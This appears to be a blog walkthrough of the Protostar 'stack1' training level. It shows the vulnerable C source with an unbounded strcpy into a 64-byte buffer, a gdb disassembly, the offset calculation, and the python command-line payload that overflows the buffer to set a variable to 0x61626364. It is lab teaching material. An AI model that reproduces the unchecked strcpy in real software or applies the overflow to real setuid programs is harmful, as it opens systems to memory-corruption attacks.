protostar - stack 1

2 minute read

Lets check the file type of our binary using file command,

$ file stack1
stack1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

Lets try running it,

$ ./stack1
stack1: please specify an argument

$ ./stack1 monish
Try again, you got 0x00000000

It seems like we have to overwrite the buffer with some value

Lets view the source code for proper understanding,

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

We need to overwrite the modified variable with 0x61626364

Lets use our debugger to analyse it,

Disassembling main(),

(gdb) disas main
Dump of assembler code for function main:
0x08048464 <main+0>:	push   ebp
0x08048465 <main+1>:	mov    ebp,esp
0x08048467 <main+3>:	and    esp,0xfffffff0
0x0804846a <main+6>:	sub    esp,0x60
0x0804846d <main+9>:	cmp    DWORD PTR [ebp+0x8],0x1
0x08048471 <main+13>:	jne    0x8048487 <main+35>
0x08048473 <main+15>:	mov    DWORD PTR [esp+0x4],0x80485a0
0x0804847b <main+23>:	mov    DWORD PTR [esp],0x1
0x08048482 <main+30>:	call   0x8048388 <errx@plt>
0x08048487 <main+35>:	mov    DWORD PTR [esp+0x5c],0x0
0x0804848f <main+43>:	mov    eax,DWORD PTR [ebp+0xc]
0x08048492 <main+46>:	add    eax,0x4
0x08048495 <main+49>:	mov    eax,DWORD PTR [eax]
0x08048497 <main+51>:	mov    DWORD PTR [esp+0x4],eax
0x0804849b <main+55>:	lea    eax,[esp+0x1c]
0x0804849f <main+59>:	mov    DWORD PTR [esp],eax
0x080484a2 <main+62>:	call   0x8048368 <strcpy@plt>
0x080484a7 <main+67>:	mov    eax,DWORD PTR [esp+0x5c]
0x080484ab <main+71>:	cmp    eax,0x61626364
0x080484b0 <main+76>:	jne    0x80484c0 <main+92>
0x080484b2 <main+78>:	mov    DWORD PTR [esp],0x80485bc
0x080484b9 <main+85>:	call   0x8048398 <puts@plt>
0x080484be <main+90>:	jmp    0x80484d5 <main+113>
0x080484c0 <main+92>:	mov    edx,DWORD PTR [esp+0x5c]
0x080484c4 <main+96>:	mov    eax,0x80485f3
0x080484c9 <main+101>:	mov    DWORD PTR [esp+0x4],edx
0x080484cd <main+105>:	mov    DWORD PTR [esp],eax
0x080484d0 <main+108>:	call   0x8048378 <printf@plt>
0x080484d5 <main+113>:	leave
0x080484d6 <main+114>:	ret

Here modified is set to 0 by,

0x08048487 <main+35>:	mov    DWORD PTR [esp+0x5c],0x0

Here buffer space is allocated by,

0x0804849b <main+55>:	lea    eax,[esp+0x1c]

Inorder to overwrite modified we need to find the space between them,

>>> print(0x5c-0x1c)
64

Passing 64 bytes of junk,

$ ./stack1 $(python -c "print('A'*64)")
Try again, you got 0x00000000

Lets try to overwrite,

$ ./stack1 $(python -c "print('A'*64+'BBBB')")
Try again, you got 0x42424242

We successfully ovewrote our junk BBBB

Lets exploit it,

$ ./stack1 $(python -c "print('A'*64+'\x64\x63\x62\x61')")
you have correctly got the variable to the right value

Done! we have completed “stack1”

Monish Kumar